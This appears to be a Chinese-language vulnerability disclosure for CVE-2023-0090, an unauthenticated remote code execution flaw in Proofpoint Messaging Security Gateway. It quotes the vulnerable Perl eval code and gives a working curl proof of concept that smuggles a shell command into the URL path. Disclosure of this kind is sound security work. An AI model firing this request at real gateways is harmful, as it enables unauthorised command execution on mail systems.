安全研究员:ly1g3,ly1g3[at]tuta.io
GPG 指纹:https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
概述:远程代码执行 - 未认证 RCE
CVE:CVE-2023-0090
时间线:
Proofpoint Messaging Security Gateway 的漏洞利用
通过访问 WebServices API,可以在未经认证的情况下实现具有管理员权限的 RCE。
Webservices.pm 未对用户输入进行清理或检查。访问该函数无需认证,但必须在设置中启用 API 访问才能执行 RCE。$module 直接来自用户数据并被 eval 执行。
my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";
...
eval("require $module");
将在 /tmp/ 下创建名为 abc 的文件。代码以 pps 用户身份运行。
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"